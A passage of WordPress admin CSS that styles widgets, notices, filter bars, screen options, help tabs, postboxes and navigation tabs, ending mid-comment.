.widget-in-question .widget-top, #available-widgets .widget-top:hover, div#widgets-right .widget-top:hover, #widgets-left .widget-top:hover { border-color: #8c8f94; box-shadow: 0 1px 2px rgba(0, 0, 0, 0.1); } .sorthelper { background-color: #c5d9ed; } .ac_match, .subsubsub a.current { color: #000; } .striped > tbody > :nth-child(odd), ul.striped > :nth-child(odd), .alternate { background-color: #f6f7f7; } .bar { background-color: #f0f0f1; border-right-color: var(--wp-admin-theme-color); } /* Helper classes for plugins to leverage the active WordPress color scheme */ .highlight { background-color: rgba(var(--wp-admin-theme-color--rgb), 0.08); color: #3c434a; } .wp-ui-primary { color: #fff; background-color: #2c3338; } .wp-ui-text-primary { color: #2c3338; } .wp-ui-highlight { color: #fff; background-color: #2271b1; } .wp-ui-text-highlight { color: #2271b1; } .wp-ui-notification { color: #fff; background-color: #d63638; } .wp-ui-text-notification { color: #d63638; } .wp-ui-text-icon { color: #8c8f94; /* same as new icons */ } /* For emoji replacement images */ img.emoji { display: inline !important; border: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; box-shadow: none !important; } /*------------------------------------------------------------------------------ 1.0 - Text Styles ------------------------------------------------------------------------------*/ .widget .widget-top, .postbox .hndle, .stuffbox .hndle, .control-section .accordion-section-title, .sidebar-name, #nav-menu-header, #nav-menu-footer, .menu-item-handle, .checkbox, .side-info, #your-profile #rich_editing, .widefat thead th, .widefat thead td, .widefat tfoot th, .widefat tfoot td { line-height: 1.4em; } .widget .widget-top, .menu-item-handle { background: #f6f7f7; color: #1d2327; } .stuffbox .hndle { border-bottom: 1px solid #c3c4c7; } .quicktags { background-color: #c3c4c7; color: #000; font-size: 12px; } .icon32 { display: none; } /* @todo can we combine these into a class or use an existing dashicon one? */ .welcome-panel .welcome-panel-close:before, .tagchecklist .ntdelbutton .remove-tag-icon:before, #bulk-titles .ntdelbutton:before, .notice-dismiss:before { background: none; color: #1e1e1e; content: "\f335"; content: "\f335" / ''; display: block; font: normal 20px/1 dashicons; height: 1em; text-align: center; width: 1em; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .welcome-panel .welcome-panel-close:before { margin: 0; } .tagchecklist .ntdelbutton .remove-tag-icon:before { margin-left: 2px; border-radius: 50%; color: var(--wp-admin-theme-color, #3858e9); /* vertically center the icon cross browsers */ line-height: 1.1; } .tagchecklist .ntdelbutton:focus { outline: 0; } .tagchecklist .ntdelbutton:hover .remove-tag-icon:before, .tagchecklist .ntdelbutton:focus .remove-tag-icon:before, #bulk-titles .ntdelbutton:hover:before, #bulk-titles .ntdelbutton:focus:before { color: #d63638; } .tagchecklist .ntdelbutton:focus .remove-tag-icon:before { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .key-labels label { line-height: 24px; } strong, b { font-weight: 600; } .pre { /* https://developer.mozilla.org/en-US/docs/CSS/white-space */ white-space: pre-wrap; /* css-3 */ word-wrap: break-word; /* IE 5.5 - 7 */ } .howto { color: #646970; display: block; } p.install-help { margin: 8px 0; font-style: italic; } .no-break { white-space: nowrap; } hr { border: 0; border-top: 1px solid #dcdcde; border-bottom: 1px solid #f6f7f7; } .row-actions span.delete a, .row-actions span.trash a, .row-actions span.spam a, .plugins a.delete, #all-plugins-table .plugins a.delete, #search-plugins-table .plugins a.delete, .submitbox .submitdelete, #media-items a.delete, #media-items a.delete-permanently, #nav-menu-footer .menu-delete, #delete-link a.delete, a#remove-post-thumbnail, .privacy_requests .remove-personal-data .remove-personal-data-handle { color: #b32d2e; } abbr.required, span.required, .file-error, .row-actions .delete a:hover, .row-actions .trash a:hover, .row-actions .spam a:hover, .plugins a.delete:hover, #all-plugins-table .plugins a.delete:hover, #search-plugins-table .plugins a.delete:hover, .submitbox .submitdelete:hover, #media-items a.delete:hover, #media-items a.delete-permanently:hover, #nav-menu-footer .menu-delete:hover, #delete-link a.delete:hover, a#remove-post-thumbnail:hover, .privacy_requests .remove-personal-data .remove-personal-data-handle:hover { color: #b32d2e; border: none; } .application-password-display .success { color: #007017; margin-left: 0.5rem; } /*------------------------------------------------------------------------------ 3.0 - Actions ------------------------------------------------------------------------------*/ #major-publishing-actions { padding: 10px; clear: both; border-top: 1px solid #dcdcde; background: #f6f7f7; display: flex; flex-wrap: wrap; align-items: center; justify-content: space-between; } #delete-action { line-height: 2.30769231; /* 30px */ } #delete-link a { text-decoration: none; } #publishing-action { text-align: right; margin-left: auto; line-height: 1.9; } #publishing-action .spinner { float: none; } #misc-publishing-actions { padding: 6px 0 0; } .misc-pub-section { padding: 6px 10px 8px; } .word-wrap-break-word, .misc-pub-filename { word-wrap: break-word; } #minor-publishing-actions { padding: 10px 10px 0; text-align: right; } #save-post { float: left; } .preview { float: right; } #sticky-span { margin-left: 18px; } .approve, .unapproved .unapprove { display: none; } .unapproved .approve, .spam .approve, .trash .approve { display: inline; } td.action-links, th.action-links { text-align: right; } #misc-publishing-actions .notice { margin-left: 10px; margin-right: 10px; } /* Filter bar */ .wp-filter { display: inline-block; position: relative; box-sizing: border-box; margin: 12px 0 25px; padding: 0 10px; width: 100%; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); border: 1px solid #c3c4c7; background: #fff; color: #50575e; font-size: 13px; } .wp-filter a { text-decoration: none; } .filter-count { display: inline-block; vertical-align: middle; min-width: 4em; } .title-count, .filter-count .count { display: inline-block; position: relative; top: -1px; padding: 4px 10px; border-radius: 30px; background: #646970; color: #fff; font-size: 14px; font-weight: 600; } /* not a part of filter bar, but derived from it, so here for now */ .title-count { display: inline; top: -3px; margin-left: 5px; margin-right: 20px; } .filter-items { float: left; } .filter-links { display: inline-block; margin: 0; } .filter-links li { display: inline-block; margin: 0; } .filter-links li > a { display: inline-block; margin: 0 10px; padding: 15px 0; border-bottom: 4px solid #fff; color: #646970; cursor: pointer; } .filter-links .current { box-shadow: none; border-bottom: 4px solid var(--wp-admin-theme-color); color: #1d2327; } .filter-links li > a:hover, .filter-links li > a:focus, .show-filters .filter-links a.current:hover, .show-filters .filter-links a.current:focus { color: var(--wp-admin-theme-color); } .wp-filter .search-form { float: right; display: flex; align-items: center; column-gap: .5rem; } .wp-filter .search-form input[type="search"] { width: 280px; max-width: 100%; } .wp-filter .search-form select { margin: 0; } .wp-filter .search-form input[type="search"] { min-height: 32px; padding: 0 8px; } .wp-filter .search-form select, .wp-filter .filter-items select { min-height: 32px; line-height: 2.14285714; /* 30px for 32px height with 14px font */ padding: 0 24px 0 8px; } .wp-filter .button { min-height: 32px; line-height: 2.30769231; /* 30px for 32px height with 13px font */ padding: 0 12px; } /* Use flexbox only on the plugins install page and upload page. The `filter-links` and search form children will become flex items. */ .plugin-install-php .wp-filter, .upload-php .wp-filter { display: flex; flex-wrap: wrap; justify-content: space-between; align-items: center; } .wp-filter .search-form.search-plugins select, .wp-filter .search-form.search-plugins .wp-filter-search, .no-js .wp-filter .search-form.search-plugins .button { display: inline-block; vertical-align: top; } .wp-filter .button.drawer-toggle { margin: 10px 9px 0; padding: 0 10px 0 6px; border-color: transparent; background-color: transparent; color: #646970; vertical-align: baseline; box-shadow: none; } .wp-filter .drawer-toggle:before { content: "\f111"; content: "\f111" / ''; margin: 0 5px 0 0; color: #646970; font: normal 16px/1 dashicons; vertical-align: text-bottom; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } .wp-filter .button.drawer-toggle:hover, .wp-filter .drawer-toggle:hover:before, .wp-filter .button.drawer-toggle:focus, .wp-filter .drawer-toggle:focus:before { background-color: transparent; color: var(--wp-admin-theme-color); } .wp-filter .button.drawer-toggle:hover, .wp-filter .button.drawer-toggle:focus:active { border-color: transparent; } .wp-filter .button.drawer-toggle:focus { border-color: var(--wp-admin-theme-color); } .wp-filter .button.drawer-toggle:active { background: transparent; box-shadow: none; transform: none; } .wp-filter .drawer-toggle.current:before { color: #fff; } .filter-drawer, .wp-filter .favorites-form { display: none; margin: 0 -10px 0 -20px; padding: 20px; border-top: 1px solid #f0f0f1; background: #f6f7f7; overflow: hidden; } .wp-filter .favorites-form .favorites-username { display: flex; align-items: center; flex-wrap: wrap; gap: 0.5rem; } .wp-filter .favorites-form .favorites-username input { margin: 0; } .show-filters .filter-drawer, .show-favorites-form .favorites-form { display: block; } .show-filters .filter-links a.current { border-bottom: none; } .show-filters .wp-filter .button.drawer-toggle { border-radius: 2px; background: #646970; color: #fff; } .show-filters .wp-filter .drawer-toggle:hover, .show-filters .wp-filter .drawer-toggle:focus { background: var(--wp-admin-theme-color); } .show-filters .wp-filter .drawer-toggle:before { color: #fff; } .filter-group { box-sizing: border-box; position: relative; float: left; margin: 0 1% 0 0; padding: 20px 10px 10px; width: 24%; background: #fff; border: 1px solid #dcdcde; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); } .filter-group legend { position: absolute; top: 10px; display: block; margin: 0; padding: 0; font-size: 1em; font-weight: 600; } .filter-drawer .filter-group-feature { margin: 28px 0 0; list-style-type: none; font-size: 12px; } .filter-drawer .filter-group-feature input, .filter-drawer .filter-group-feature label { line-height: 1.4; } .filter-drawer .filter-group-feature input { position: absolute; margin: 0; } .filter-group .filter-group-feature label { display: block; margin: 14px 0 14px 23px; } .filter-drawer .buttons { clear: both; margin-bottom: 20px; } .filter-drawer .filter-group + .buttons { margin-bottom: 0; padding-top: 20px; } .filter-drawer .buttons .button span { display: inline-block; opacity: 0.8; font-size: 12px; text-indent: 10px; } .wp-filter .button.clear-filters { display: none; margin-left: 10px; } .wp-filter .button-link.edit-filters { padding: 0 5px; line-height: 2.2; } .filtered-by { display: none; margin: 0; } .filtered-by > span { font-weight: 600; } .filtered-by a { margin-left: 10px; } .filtered-by .tags { display: flex; align-items: flex-start; flex-wrap: wrap; gap: 8px; } .filtered-by .tag { padding: 4px 8px; border: 1px solid #dcdcde; box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04); background: #fff; font-size: 11px; } .filters-applied .filter-group, .filters-applied .filter-drawer .buttons, .filters-applied .filter-drawer br { display: none; } .filters-applied .filtered-by { display: flex; align-items: center; flex-wrap: wrap; gap: 10px; } .filters-applied .filter-drawer { padding: 20px; } .show-filters .favorites-form, .show-filters .content-filterable, .show-filters.filters-applied.loading-content .content-filterable, .loading-content .content-filterable, .error .content-filterable { display: none; } .show-filters.filters-applied .content-filterable { display: block; } .loading-content .spinner { display: block; margin: 40px auto 0; float: none; } @media only screen and (max-width: 1138px) { .wp-filter .search-form { margin: 11px 0; } } @media only screen and (max-width: 1250px) { .wp-filter:has(.plugin-install-search) .search-form { margin: 11px 0; } } @media only screen and (max-width: 1120px) { .filter-drawer { border-bottom: 1px solid #f0f0f1; } .filter-group { margin-bottom: 0; margin-top: 5px; width: 100%; } .filter-group li { margin: 10px 0; } } @media only screen and (max-width: 1000px) { .filter-items { float: none; } .wp-filter .media-toolbar-primary, .wp-filter .media-toolbar-secondary, .wp-filter .search-form { float: none; /* Remove float from media-views.css */ position: relative; max-width: 100%; } .wp-filter .search-form { margin: 11px 0; flex-wrap: wrap; row-gap: 10px; } } @media only screen and (max-width: 782px) { .filter-group li { padding: 0; width: 50%; } .wp-filter .search-form input[type="search"] { min-height: 40px; padding: 0 12px; } .wp-filter .search-form select, .wp-filter .filter-items select { min-height: 40px; padding: 0 24px 0 12px; } } @media only screen and (max-width: 320px) { .filter-count { display: none; } .wp-filter .drawer-toggle { margin: 10px 0; } .filter-group li, .wp-filter .search-form input[type="search"] { width: 100%; } } /*------------------------------------------------------------------------------ 4.0 - Notifications ------------------------------------------------------------------------------*/ .notice, div.updated, div.error { background: #fff; border: none; border-left: 4px solid #c3c4c7; box-shadow: none; margin: 5px 15px 2px; padding: 8px 12px; } div[class="update-message"] { /* back-compat for pre-4.6 */ padding: 0.5em 12px 0.5em 0; } .notice p, .notice-title, div.updated p, div.error p, .form-table td .notice p { margin: 0.5em 0; padding: 0; font-size: 13px; line-height: 1.54; color: #1e1e1e; } div.notice a, div.error a, div.updated a { color: var(--wp-admin-theme-color-darker-10); text-decoration: underline; } div.notice a:hover, div.error a:hover, div.updated a:hover { color: var(--wp-admin-theme-color-darker-20); } div.notice a:focus, div.error a:focus, div.updated a:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline: 2px solid transparent; border-radius: 2px; } .notice-alt { box-shadow: none; } .notice-large { padding: 10px 20px; } .notice-title { display: inline-block; color: #1d2327; font-size: 18px; } .wp-core-ui .notice.is-dismissible { padding-right: 48px; position: relative; } .notice-dismiss { position: absolute; top: 12px; right: 12px; border: none; margin: 0; padding: 0; background: none; color: #1e1e1e; cursor: pointer; width: 24px; height: 24px; display: flex; align-items: center; justify-content: center; border-radius: 2px; } .notice-dismiss:hover:before, .notice-dismiss:active:before { color: #1e1e1e; opacity: 0.7; } .notice-dismiss:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .notice-dismiss:focus:before { color: #1e1e1e; } .notice-success, div.updated { border-left-color: #4ab866; background-color: #eff9f1; } .notice-success.notice-alt, div.updated.notice-alt { background-color: #eff9f1; } .notice-warning { border-left-color: #f0b849; background-color: #fef8ee; } .notice-warning.notice-alt { background-color: #fef8ee; } .notice-error, div.error { border-left-color: #cc1818; background-color: #fcf0f0; } .notice-error.notice-alt, div.error.notice-alt { background-color: #fcf0f0; } .notice-info { border-left-color: #3858e9; background-color: #fff; } .notice-info.notice-alt { background-color: #fff; } #plugin-information-footer .update-now:not(.button-disabled):before { color: #d63638; content: "\f463"; content: "\f463" / ''; display: inline-block; font: normal 20px/1 dashicons; margin: -3px 5px 0 -2px; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; vertical-align: middle; } #plugin-information-footer .notice { margin-top: -5px; } .update-message p:before, .updating-message p:before, .updated-message p:before, .import-php .updating-message:before, .button.updating-message:before, .button.updated-message:before, .button.installed:before, .button.installing:before, .button.activating-message:before, .button.activated-message:before { display: inline-block; font: normal 20px/1 'dashicons'; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; vertical-align: top; } .wrap .notice, .wrap div.updated, .wrap div.error, .media-upload-form .notice, .media-upload-form div.error { margin: 5px 0 15px; } .wrap #templateside .notice { display: block; margin: 0; padding: 5px 8px; font-weight: 600; text-decoration: none; } .wrap #templateside span.notice { margin-left: -12px; } #templateside li.notice a { padding: 0; } /* Update icon. */ .update-message p:before, .updating-message p:before, .import-php .updating-message:before, .button.updating-message:before, .button.installing:before, .button.activating-message:before { color: #d63638; content: "\f463"; content: "\f463" / ''; } /* Spins the update icon. */ .updating-message p:before, .import-php .updating-message:before, .button.updating-message:before, .button.installing:before, .button.activating-message:before, .plugins .column-auto-updates .dashicons-update.spin, .theme-overlay .theme-autoupdate .dashicons-update.spin { animation: rotation 2s infinite linear; } @media (prefers-reduced-motion: reduce) { .updating-message p:before, .import-php .updating-message:before, .button.updating-message:before, .button.installing:before, .button.activating-message:before, .plugins .column-auto-updates .dashicons-update.spin, .theme-overlay .theme-autoupdate .dashicons-update.spin { animation: none; } } .theme-overlay .theme-autoupdate .dashicons-update.spin { margin-right: 3px; } /* Updated icon (check mark). */ .updated-message p:before, .installed p:before, .button.updated-message:before, .button.activated-message:before { color: #68de7c; content: "\f147"; content: "\f147" / ''; } /* Error icon. */ .update-message.notice-error p:before { color: #d63638; content: "\f534"; content: "\f534" / ''; } .wrap .notice p:before, .import-php .updating-message:before { margin-right: 6px; } .import-php .updating-message:before { vertical-align: bottom; } #update-nag, .update-nag { display: inline-block; line-height: 1.4; padding: 11px 15px; font-size: 14px; margin: 25px 20px 0 2px; } ul#dismissed-updates { display: none; } #dismissed-updates li > p { margin-top: 0; } #dismiss, #undismiss { margin-left: 0.5em; } form.upgrade { margin-top: 8px; } form.upgrade .hint { font-style: italic; font-size: 85%; margin: -0.5em 0 2em; } .update-php .spinner { float: none; margin: -4px 0; } h2.wp-current-version { margin-bottom: .3em; } p.update-last-checked { margin-top: 0; } p.auto-update-status { margin-top: 2em; line-height: 1.8; } #ajax-loading, .ajax-loading, .ajax-feedback, .imgedit-wait-spin, .list-ajax-loading { /* deprecated */ visibility: hidden; } #ajax-response.alignleft { margin-left: 2em; } .button.updating-message:before, .button.updated-message:before, .button.installed:before, .button.installing:before, .button.activated-message:before, .button.activating-message:before { margin: 0 5px 0 -2px; line-height: 1.9; /* 38px (20px * 1.9) - matches button */ vertical-align: top; } #plugin-information-footer .button { padding: 0 14px; line-height: 2.71428571; /* 38px */ font-size: 14px; vertical-align: middle; min-height: 40px; margin-bottom: 4px; } #plugin-information-footer .button.installed:before, #plugin-information-footer .button.installing:before, #plugin-information-footer .button.updating-message:before, #plugin-information-footer .button.updated-message:before, #plugin-information-footer .button.activated-message:before, #plugin-information-footer .button.activating-message:before { margin: 0 5px 0 -2px; line-height: 1.9; /* 38px (20px * 1.9) - matches button */ vertical-align: top; } #plugin-information-footer .button.update-now.updating-message:before { margin: 0 5px 0 -2px; } .button-primary.updating-message:before, .button-primary.activating-message:before { color: #fff; } .button-primary.updated-message:before, .button-primary.activated-message:before { color: #9ec2e6; } .button.updated-message, .button.activated-message { transition-property: border, background, color; transition-duration: .05s; transition-timing-function: ease-in-out; } /* @todo: this does not need its own section anymore */ /*------------------------------------------------------------------------------ 6.0 - Admin Header ------------------------------------------------------------------------------*/ #adminmenu a, #taglist a, #catlist a { text-decoration: none; } /*------------------------------------------------------------------------------ 6.1 - Screen Options Tabs ------------------------------------------------------------------------------*/ #screen-options-wrap, #contextual-help-wrap { margin: 0; padding: 8px 20px 12px; position: relative; } #contextual-help-wrap { overflow: auto; margin-left: 0; } #screen-meta-links { float: right; margin: 0 20px 0 0; } /* screen options and help tabs revert */ #screen-meta { display: none; margin: 0 20px -1px 0; position: relative; background-color: #fff; border: 1px solid #c3c4c7; border-top: none; box-shadow: 0 0 0 transparent; } #screen-options-link-wrap, #contextual-help-link-wrap { float: left; margin: 0 0 0 6px; } #screen-meta-links .screen-meta-toggle { position: relative; top: 0; } #screen-meta-links .show-settings { border: 1px solid #c3c4c7; border-top: none; height: auto; margin-bottom: 0; padding: 0 6px 0 16px; background: #fff; border-radius: 0 0 4px 4px; color: #646970; box-shadow: 0 0 0 transparent; transition: box-shadow 0.1s linear; } #screen-meta-links .show-settings:hover, #screen-meta-links .show-settings:active, #screen-meta-links .show-settings:focus { color: #2c3338; } #screen-meta-links .show-settings:focus { border-color: var(--wp-admin-theme-color, #3858e9); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } #screen-meta-links .show-settings:active { transform: none; } #screen-meta-links .show-settings:after { right: 0; content: "\f140"; content: "\f140" / ''; font: normal 20px/1.5 dashicons; /* line-height 1.5 = 30px to match compact button */ display: inline-block; padding: 0 5px 0 0; vertical-align: top; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; text-decoration: none; } #screen-meta-links .screen-meta-active:after { content: "\f142"; content: "\f142" / ''; } /* end screen options and help tabs */ .toggle-arrow { background-repeat: no-repeat; background-position: top left; background-color: transparent; height: 22px; line-height: 22px; display: block; } .toggle-arrow-active { background-position: bottom left; } #screen-options-wrap h5, /* Back-compat for old plugins */ #screen-options-wrap legend, #contextual-help-wrap h5 { margin: 0; padding: 8px 0; font-size: 13px; font-weight: 600; } .metabox-prefs label { display: inline-block; padding-right: 15px; line-height: 2.35; } #number-of-columns { display: inline-block; vertical-align: middle; line-height: 30px; } .metabox-prefs input[type=checkbox] { margin-top: 0; margin-right: 6px; } .metabox-prefs label input, .metabox-prefs label input[type=checkbox] { margin: -4px 5px 0 0; } .metabox-prefs .columns-prefs label input { margin: -1px 2px 0 0; } .metabox-prefs label a { display: none; } .metabox-prefs .screen-options input, .metabox-prefs .screen-options label { margin-top: 0; margin-bottom: 0; vertical-align: middle; } .metabox-prefs .screen-options .screen-per-page { margin-right: 15px; padding-right: 0; } .metabox-prefs .screen-options label { line-height: 2.2; padding-right: 0; } .screen-options + .screen-options { margin-top: 10px; } .metabox-prefs .submit { margin-top: 1em; padding: 0; } /*------------------------------------------------------------------------------ 6.2 - Help Menu ------------------------------------------------------------------------------*/ #contextual-help-wrap { padding: 0; } #contextual-help-columns { position: relative; } #contextual-help-back { position: absolute; top: 0; bottom: 0; left: 150px; right: 170px; border: 1px solid #c3c4c7; border-top: none; border-bottom: none; background: rgba(var(--wp-admin-theme-color--rgb), 0.08); } #contextual-help-wrap.no-sidebar #contextual-help-back { right: 0; border-right-width: 0; border-bottom-right-radius: 2px; } .contextual-help-tabs { float: left; width: 150px; margin: 0; } .contextual-help-tabs ul { margin: 1em 0; } .contextual-help-tabs li { margin-bottom: 0; list-style-type: none; border-style: solid; border-width: 0 0 0 2px; border-color: transparent; } .contextual-help-tabs a { display: block; padding: 5px 5px 5px 12px; line-height: 1.4; text-decoration: none; border: 1px solid transparent; border-right: none; border-left: none; } .contextual-help-tabs a:hover { color: #2c3338; } .contextual-help-tabs .active { padding: 0; margin: 0 -1px 0 0; border-left: 2px solid var(--wp-admin-theme-color); background: color-mix(in srgb, var(--wp-admin-theme-color) 8%, white); box-shadow: 0 2px 0 rgba(0, 0, 0, 0.02), 0 1px 0 rgba(0, 0, 0, 0.02); } .contextual-help-tabs .active a { border-color: #c3c4c7; color: #2c3338; } .contextual-help-tabs-wrap { padding: 0 20px; overflow: auto; } .help-tab-content { display: none; margin: 0 22px 12px 0; line-height: 1.6; } .help-tab-content.active { display: block; } .help-tab-content ul li { list-style-type: disc; margin-left: 18px; } .contextual-help-sidebar { width: 150px; float: right; padding: 0 8px 0 12px; overflow: auto; } /*------------------------------------------------------------------------------ 8.0 - Layout Blocks ------------------------------------------------------------------------------*/ html.wp-toolbar { padding-top: var(--wp-admin--admin-bar--height); box-sizing: border-box; -ms-overflow-style: scrollbar; /* See ticket #48545 */ } .widefat th, .widefat td { color: #50575e; } .widefat th, .widefat thead td, .widefat tfoot td { font-weight: 400; } .widefat thead tr th, .widefat thead tr td, .widefat tfoot tr th, .widefat tfoot tr td { color: #2c3338; } .widefat td p { margin: 2px 0 0.8em; } .widefat p, .widefat ol, .widefat ul { color: #2c3338; } .widefat .column-comment p { margin: 0.6em 0; } .widefat .column-comment ul { list-style: initial; margin-left: 2em; } /* Screens with postboxes */ .postbox-container { float: left; } .postbox-container .meta-box-sortables { box-sizing: border-box; } #wpbody-content .metabox-holder { padding-top: 10px; } .metabox-holder .postbox-container .meta-box-sortables { /* The jQuery UI Sortables need some initial height to work properly. */ min-height: 1px; position: relative; } #post-body-content { width: 100%; min-width: 463px; float: left; } #post-body.columns-2 #postbox-container-1 { float: right; margin-right: -300px; width: 280px; } #post-body.columns-2 #side-sortables { min-height: 250px; } /* one column on the dash */ @media only screen and (max-width: 799px) { #wpbody-content .metabox-holder .postbox-container .empty-container { outline: none; height: 0; min-height: 0; } } .js .widget .widget-top, .js .postbox .hndle { cursor: move; } .js .widget .widget-top.is-non-sortable, .js .postbox .hndle.is-non-sortable { cursor: auto; } /* Configurable dashboard widgets "Configure" edit-box link. */ .hndle a { font-size: 12px; font-weight: 400; } .postbox-header { display: flex; align-items: center; justify-content: space-between; border-bottom: 1px solid #c3c4c7; } .postbox-header .hndle { flex-grow: 1; /* Handle the alignment for the configurable dashboard widgets "Configure" edit-box link. */ display: flex; justify-content: space-between; align-items: center; } .postbox-header .handle-actions { flex-shrink: 0; } /* Post box order and toggle buttons. */ .postbox .handle-order-higher, .postbox .handle-order-lower, .postbox .handlediv { width: 1.62rem; height: 1.62rem; margin: 0; padding: 0; border: 0; background: none; cursor: pointer; } .postbox .handle-order-higher, .postbox .handle-order-lower { color: #646970; width: 1.62rem; } /* Post box order buttons in the block editor meta boxes area. */ .edit-post-meta-boxes-area .postbox .handle-order-higher, .edit-post-meta-boxes-area .postbox .handle-order-lower { width: 44px; height: 44px; color: #1d2327 } .postbox .handle-order-higher[aria-disabled="true"], .postbox .handle-order-lower[aria-disabled="true"] { cursor: default; color: #a7aaad; } .sortable-placeholder:not(.empty-container .sortable-placeholder) { border: 1px dashed #c3c4c7; border-radius: 8px; margin-bottom: 20px; } .postbox, .stuffbox { margin-bottom: 20px; padding: 0; line-height: 1; } .postbox.closed .postbox-header { border-bottom: 0; } /* user-select is not a part of the CSS standard - may change behavior in the future */ .postbox .hndle, .stuffbox .hndle { -webkit-user-select: none; user-select: none; } .postbox .inside { padding: 0 12px 12px; line-height: 1.4; font-size: 13px; } .stuffbox .inside { padding: 0; line-height: 1.4; font-size: 13px; margin-top: 0; } .postbox .inside { margin: 11px 0; position: relative; } .postbox .inside > p:last-child, .rss-widget ul li:last-child { margin-bottom: 1px !important; } .postbox.closed h3 { border: none; box-shadow: none; } .postbox table.form-table { margin-bottom: 0; } .postbox table.widefat { box-shadow: none; } .temp-border { border: 1px dotted #c3c4c7; } .columns-prefs label { padding: 0 10px 0 0; } /* @todo: what is this doing here */ #dashboard_right_now .versions .b, #post-status-display, #post-visibility-display, #adminmenu .wp-submenu li.current, #adminmenu .wp-submenu li.current a, #adminmenu .wp-submenu li.current a:hover, .media-item .percent, .plugins .name, #pass-strength-result.strong, #pass-strength-result.short, #ed_reply_toolbar #ed_reply_strong, .item-controls .item-order a, .feature-filter .feature-name, #comment-status-display { font-weight: 600; } /*------------------------------------------------------------------------------ 21.0 - Admin Footer ------------------------------------------------------------------------------*/ #wpfooter { position: absolute; bottom: 0; left: 0; right: 0; padding: 10px 20px; color: #50575e; } #wpfooter p { font-size: 13px; margin: 0; line-height: 1.55; } #footer-thankyou { font-style: italic; } /*------------------------------------------------------------------------------ 25.0 - Tabbed Admin Screen Interface (Experimental) ------------------------------------------------------------------------------*/ .nav-tab { float: left; border: 1px solid #c3c4c7; border-bottom: none; margin-left: 0.5em; /* half the font size so set the font size properly */ padding: 5px 10px; font-size: 14px; line-height: 1.71428571; font-weight: 600; background: #dcdcde; color: #50575e; text-decoration: none; white-space: nowrap; } h3 .nav-tab, /* Back-compat for pre-4.4 */ .nav-tab-small .nav-tab { padding: 5px 14px; font-size: 12px; line-height: 1.33; } .nav-tab:hover, .nav-tab:focus { background-color: #fff; color: #3c434a; } .nav-tab-active, .nav-tab:focus:active { box-shadow: none; } .nav-tab-active { margin-bottom: -1px; color: #3c434a; } .nav-tab-active, .nav-tab-active:hover, .nav-tab-active:focus, .nav-tab-active:focus:active { border-bottom: 1px solid #f0f0f1; background: #f0f0f1; color: #000; } h1.nav-tab-wrapper, /* Back-compat for pre-4.4 */ .wrap h2.nav-tab-wrapper, /* higher specificity to override .wrap > h2:first-child */ .nav-tab-wrapper { border-bottom: 1px solid #c3c4c7; margin: 0; padding-top: 9px; padding-bottom: 0; line-height: inherit; } /* Back-compat for plugins. Deprecated. Use .wp-clearfix instead. */ .nav-tab-wrapper:not(.wp-clearfix):after { content: ""; display: table; clear: both; } /*------------------------------------------------------------------------------ 26.0 - Misc ------------------------------------------------------------------------------*/ .spinner { background: url(../images/spinner.gif) no-repeat; background-size: 20px 20px; display: inline-block; visibility: hidden; float: right; vertical-align: middle; opacity: 0.7; filter: alpha(opacity=70); width: 20px; height: 20px; margin: 10px 10px 0; } .spinner.is-active, .loading-content .spinner { visibility: visible; } #template > div { margin-right: 16em; } #template .notice { margin-top: 1em; margin-right: 3%; } #template .notice p { width: auto; } #template .submit .spinner { float: none; vertical-align: top; } .metabox-holder .stuffbox > h3, /* Back-compat for pre-4.4 */ .metabox-holder .postbox > h3, /* Back-compat for pre-4.4 */ .metabox-holder h3.hndle, /* Back-compat for pre-4.4 */ .metabox-holder h2.hndle { font-size: 14px; padding: 8px 12px; margin: 0; line-height: 1.4; } /* Back-compat for nav-menus screen */ .nav-menus-php .metabox-holder h3 { padding: 0; } .accordion-container h3.accordion-section-title { padding: 0 !important; } .accordion-section-title button.accordion-trigger, .nav-menus-php .metabox-holder .accordion-section-title button.accordion-trigger { background: inherit; color: #1d2327; display: block; position: relative; text-align: left; width: 100%; outline: none; border: 0; padding: 10px 10px 11px 14px; line-height: 1.5; cursor: pointer; } .accordion-section-title button.accordion-trigger:focus, .nav-menus-php .metabox-holder .accordion-section-title button.accordion-trigger:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color, #3858e9); outline: 2px solid transparent; } .accordion-section-title span.dashicons.dashicons-arrow-down, .nav-menus-php .metabox-holder .accordion-section-title span.dashicons.dashicons-arrow-down { position: absolute; right: 10px; left: auto; color: #787c82; border-radius: 50px; top: 50%; transform: translateY(-50%); } .accordion-section-title:hover span.dashicons.dashicons-arrow-down, .nav-menus-php .metabox-holder .accordion-section-title:hover span.dashicons.dashicons-arrow-down { color: #1d2327; } .accordion-section-title span.dashicons.dashicons-arrow-down::before, .nav-menus-php .metabox-holder .accordion-section-title span.dashicons.dashicons-arrow-down::before { position: relative; left: -1px; } .accordion-section.open .accordion-section-title span.dashicons.dashicons-arrow-down, .nav-menus-php .metabox-holder .accordion-section.open .accordion-section-title span.dashicons.dashicons-arrow-down { transform: rotate(180deg) translate(0, 50%); } #templateside ul li a { text-decoration: none; } .plugin-install #description, .plugin-install-network #description { width: 60%; } table .vers, table .column-visible, table .column-rating { text-align: left; } .attention, .error-message { color: #d63638; font-weight: 600; } /* Scrollbar fix for bulk upgrade iframe */ body.iframe { height: 98%; } /* Upgrader styles, Specific to Language Packs */ .lp-show-latest p { display: none; } .lp-show-latest p:last-child, .lp-show-latest .lp-error p { display: block; } /* - Only used once or twice in all of WP - 